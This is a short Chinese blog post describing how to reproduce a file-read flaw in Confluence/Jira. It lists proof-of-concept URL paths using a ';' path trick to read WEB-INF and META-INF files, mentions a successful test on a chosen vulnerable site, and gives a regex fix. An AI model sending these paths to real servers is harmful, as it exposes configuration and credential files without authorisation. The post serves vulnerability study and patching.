Confluence文件读取漏洞复现

原创已于 2022-03-06 00:16:31 修改 · 1.5k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#jira #java #maven

于 2022-03-06 00:08:14 首次发布

Web渗透测试专栏收录该内容

127 篇文章

订阅专栏

本文揭示了Confluence系统存在的多个敏感文件访问漏洞，并演示了如何复现和利用。通过正则表达式修复，着重讲解了WEB-INF和META-INF目录安全措施的改进。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1、Confluence系统都存在漏洞，漏洞poc如下:

/s/xx/_/;/WEB-INF/web.xml 
/s/xx/_/;/WEB-INF/decorators.xml 
/s/xx/_/;/WEB-INF/classes/seraph-config.xml 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 
/s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

稍加改造/s/everything/_/;anythingulike/WEB-INF/web.xml

2、挑一个漏洞站点进行复现，漏洞复现成功。

3、漏洞修复

对正则进行了删改。

Pattern PATHS_DENIED = Pattern.compile("[^a-zA-Z0-9]((?i)(WEB-INF)|(META-INF))[^a-zA-Z0-9]")